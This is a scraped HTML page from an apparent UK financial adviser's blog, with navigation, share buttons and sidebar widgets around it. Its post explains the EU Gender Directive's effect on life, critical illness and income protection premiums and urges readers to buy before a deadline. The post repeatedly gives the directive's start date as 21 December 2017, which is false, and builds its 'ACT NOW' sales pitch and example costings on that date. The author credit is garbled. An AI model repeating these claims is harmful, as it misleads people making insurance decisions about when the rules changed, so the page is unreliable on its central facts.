fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/investments\">Investments</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\"><span class=\"fusion-megamenu-bullet\"/>ISAs</a></li>&#13;\n		<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\"><span class=\"fusion-megamenu-bullet\"/>Lump Sum Investment</a></li>&#13;\n		<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\"><span class=\"fusion-megamenu-bullet\"/>Offshore Bonds</a></li>&#13;\n		<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\"><span class=\"fusion-megamenu-bullet\"/>Unit Trusts &amp; OEICs</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/trusts\">Trusts</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\"><span class=\"fusion-megamenu-bullet\"/>Asset Protection Trust</a></li>&#13;\n		<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\"><span class=\"fusion-megamenu-bullet\"/>Discretionary Trusts</a></li>&#13;\n		<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\"><span class=\"fusion-megamenu-bullet\"/>Absolute Trusts</a></li>&#13;\n		<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\"><span class=\"fusion-megamenu-bullet\"/>Gift &amp; Loan Trust</a></li>&#13;\n		<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\"><span class=\"fusion-megamenu-bullet\"/>Wills and Trust</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\"><span class=\"fusion-megamenu-bullet\"/>Critical Illness</a></li>&#13;\n		<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\"><span class=\"fusion-megamenu-bullet\"/>Serious Illness</a></li>&#13;\n		<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\"><span class=\"fusion-megamenu-bullet\"/>Relevant Life Plan</a></li>&#13;\n		<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\"><span class=\"fusion-megamenu-bullet\"/>Life Insurance</a></li>&#13;\n		<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\"><span class=\"fusion-megamenu-bullet\"/>Business Protection</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"/about-us\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"/our-team\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"/terms-of-use\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"/cookies\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"/category/video-2\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"/pension-reforms-offer-freedom-savers\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"/staging-date-social-advisors\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"/automatic-enrolment\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"/our-blog\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"/category/annuities\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8588\"><a href=\"/category/insurance-protection\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"/category/investments\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"/category/pensions\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"/category/trusts\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"/category/wealth-management\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n																<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"\" style=\"\">&#13;\n										<div id=\"post-554\" class=\"post-554 post type-post status-publish format-standard has-post-thumbnail hentry category-insurance-protection post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">G-day – Impact of the Gender Directive on Insurance</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h2>The price of some Insurance Protection is likely to increase by up to 25% after December 21st – Understand how it could affect you.</h2>&#13;\n<p>Source: Association of British Insurers (ABI)</p>&#13;\n<h1 style=\"text-align: center;\"><span style=\"color: #800000;\">Countdown to G -Day</span></h1>&#13;\n<h2 style=\"text-align: center;\">What is the Gender Directive?</h2>&#13;\n<h3 style=\"text-align: center;\"><span style=\"color: #800000;\">On 1 March 2011 The European Court of Justice (ECJ) ruled that from 21 December 2017, insurance companies won’t be able to charge people different amounts based on gender</span>&#13;\n<h3 style=\"text-align: center;\">When it comes to the cost of insurance, you could say that women have had an easier time of it than men. But that is about to change…&#13;\n<h4> What financial products are impacted upon by the Gender Directive?</h4>&#13;\n</h3></h3><p>The Gender Directive will apply to any financial product that uses gender as a factor for calculating the cost of insurance premiums. The following products (and this is by no means an exhaustive list) will be affected by the new ruling:</p>&#13;\n<ul><li>Life Cover</li>&#13;\n<li>Critical Illness Cover</li>&#13;\n<li>Income Protection Cover</li>&#13;\n<li>Annuities (retirement income)</li>&#13;\n<li>Car Insurance</li>&#13;\n</ul><h1 style=\"text-align: center;\"/>&#13;\n<div style=\"text-align: center;\"><em> Indication of how policies will change in price after the 21st December</em></div>&#13;\n<div style=\"text-align: center;\"><em/></div>&#13;\n<table class=\"aligncenter\" summary=\"How prices might change post G-day\" rules=\"all\"><thead><tr><th scope=\"col\"/>&#13;\n<th scope=\"col\">Male</th>&#13;\n<th scope=\"col\">Female</th>&#13;\n</tr></thead><tbody><tr><th scope=\"row\">Income Protection</th>&#13;\n<td><span style=\"color: #800000;\">+25%</span></td>&#13;\n<td>-30%</td>&#13;\n</tr><tr><th scope=\"row\">Critical Illness</th>&#13;\n<td>-5%</td>&#13;\n<td><span style=\"color: #800000;\">+10%</span></td>&#13;\n</tr><tr><th scope=\"row\">Term</th>&#13;\n<td>-10%</td>&#13;\n<td><span style=\"color: #800000;\">+20%</span><span style=\"text-align: center;\"> </span></td>&#13;\n</tr></tbody></table><h1 style=\"text-align: center;\"/>&#13;\n<h4 style=\"text-align: center;\">Let’s see how this will affect your wallet ( The Losers)</h4>&#13;\n<p><em>For a 39 year old non-smoker male  buying £2000 per month income protection – paying out after 8 weeks to age 65.</em></p>&#13;\n<p>Male</p>&#13;\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"2\"><thead><tr><th scope=\"col\">Current Premium</th>&#13;\n<th scope=\"col\">Potential Gender and I minus E effect</th>&#13;\n<th scope=\"col\">Indicative premium from 21 December 2017</th>&#13;\n<th scope=\"col\">The impact</th>&#13;\n</tr></thead><tbody><tr><td>£63.95</td>&#13;\n<td><span style=\"color: #800000;\">+ 25%</span></td>&#13;\n<td>£79.93</td>&#13;\n<td>An increase of £15.98 a month. Amounting to <span style=\"color: #800000;\">£4794.60</span> more over the full term</td>&#13;\n</tr></tbody></table><p>Female</p>&#13;\n<p><em>For a 45 year female non smoker buying £150,000 life cover over a 20 year term</em></p>&#13;\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"2\"><thead><tr><th scope=\"col\">Current Premium</th>&#13;\n<th scope=\"col\">Potential Gender and I minus E effect</th>&#13;\n<th scope=\"col\">Indicative premium from 21 December 2017</th>&#13;\n<th scope=\"col\">The impact</th>&#13;\n</tr></thead><tbody><tr><td>£20.03</td>&#13;\n<td><span style=\"color: #800000;\">+ 22%</span></td>&#13;\n<td>£24.44</td>&#13;\n<td>An increase of £4.41 a month. Amounting to <span style=\"color: #800000;\">£1,058.40</span> more over the full term</td>&#13;\n</tr></tbody></table><p><em>source LV= analysis, June 2017</em></p>&#13;\n<p><span style=\"color: #5f6062;\"><span style=\"font-family: Helvetica, Arial, sans-serif;\"><span style=\"font-size: small;\">These statistics stand as a hard reminder to  <span style=\"color: #800000;\">ACT NOW</span>, particularly if you have been wavering on whether or not it’s the right time to look at applying for personal protection .If you wait, you may end up paying far more for the same policy. </span></span></span></p>&#13;\n<p><span><span style=\"color: #800000;\">To increase the likelihood of beating the G Day deadline, we should have in mind a target 21 October deadline for submitting protection cases. Complete the contact form  so we can help you protect yourself and your loved ones before policy prices increase. </span></span></p>&#13;\n<blockquote><p>So don’t search the Internet any longer for the best price. We pride ourselves in finding the best suited policy for you, one that is affordable and the most likely to pay out if there was any cause to claim.</p></blockquote>&#13;\n<div><img src=\"/wp-content/uploads/2012/09/paul-reynolds.jpg\" alt=\"Becky Barnet\" width=\"68\" height=\"96\"/></div>&#13;\n<div>,<br/>&#13;\nInsurance Solutions Manager<br/>&#13;\nEquity SMART</div>&#13;\n<div/>&#13;\n<div/>&#13;\n<div class=\"review male\"><blockquote><q/></blockquote></div>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n<h4/>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"/author/sallyannhunt\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"/category/insurance-protection\" title=\"View all posts in Insurance Protection\" rel=\"category tag\">Insurance Protection</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"/g-day-impact-gender-directive-insurance\" title=\"Comment on G-day – Impact of the Gender Directive on Insurance\">1 Comment</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/&amp;p[title]=G-day%20%E2%80%93%20Impact%20of%20the%20Gender%20Directive%20on%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=G-day+-+Impact+of+the+Gender+Directive+on+Insurance%20http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/&amp;title=G-day%20%E2%80%93%20Impact%20of%20the%20Gender%20Directive%20on%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/&amp;title=G-day%20%E2%80%93%20Impact%20of%20the%20Gender%20Directive%20on%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fg-day-impact-gender-directive-insurance%2F&amp;name=G-day+-+Impact+of+the+Gender+Directive+on+Insurance&amp;description=The+price+of+some+Insurance+Protection+is+likely+to+increase+by+up+to+25%25+after+December+21st+%26%238211%3B+Understand+how+it+could+affect+you.+Source%3A%C2%A0Association+of+British+Insurers+%28ABI%29+Countdown+to+G+-Day+What+is+the+Gender+Directive%3F+On+1+March+2011+The+European+Court+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=G-day – Impact of the Gender Directive on Insurance&amp;body=http://www.equalitywalk.org.uk/g-day-impact-gender-directive-insurance/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"/author/sallyannhunt\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n	<div id=\"comments\" class=\"comments-container\">&#13;\n		<div class=\"title\"><h2>One Comment</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n&#13;\n		<ol class=\"commentlist\"><li class=\"pingback even thread-even depth-1\" id=\"comment-205\">&#13;\n&#13;\n		<div class=\"the-comment\">&#13;\n			<div class=\"avatar\">&#13;\n							</div>&#13;\n&#13;\n			<div class=\"comment-box\">&#13;\n&#13;\n				<div class=\"comment-author meta\">&#13;\n					<a href=\"http://www.silverhairs.com/men-advised-to-act-now-on-annuities-before-g-day/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-commentauthor\',\'http://www.silverhairs.com\']);\" rel=\"external nofollow\" class=\"url\">Men advised to act now on Annuities before G-Day - Silverhairs</a>&#13;\n					October 17, 2017 at 11:12 am<a class=\"comment-reply-link\" href=\"/\" onclick=\"return addComment.moveForm(&quot;comment-205&quot;, &quot;205&quot;, &quot;respond&quot;, &quot;554&quot;)\"> - Reply</a>				</div>&#13;\n&#13;\n				<div class=\"comment-text\">&#13;\n										<p>[...] for life – are being urged to purchase before the introduction of the new EU Gender Directive (G-Day), which comes into force on 21st December, to benefit from higher interest [...]</p>&#13;\n				</div>&#13;\n&#13;\n			</div>&#13;\n&#13;\n		</div>&#13;\n&#13;\n</li><!-- #comment-## -->&#13;\n		</ol><div class=\"comments-navigation\">&#13;\n		    <div class=\"alignleft\"/>&#13;\n		    <div class=\"alignright\"/>&#13;\n		</div>&#13;\n	</div>&#13;\n&#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"/g-day-impact-gender-directive-insurance\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"554\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"b090643fb2\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"132\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"/leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/best-annuity-rates\">&#13;\n										<img width=\"52\" height=\"43\" src=\"/wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/best-annuity-rates\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">&#13;\n										<img width=\"52\" height=\"21\" src=\"/wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/5-facts-know-annuities\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/staging-date-social-advisors\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" 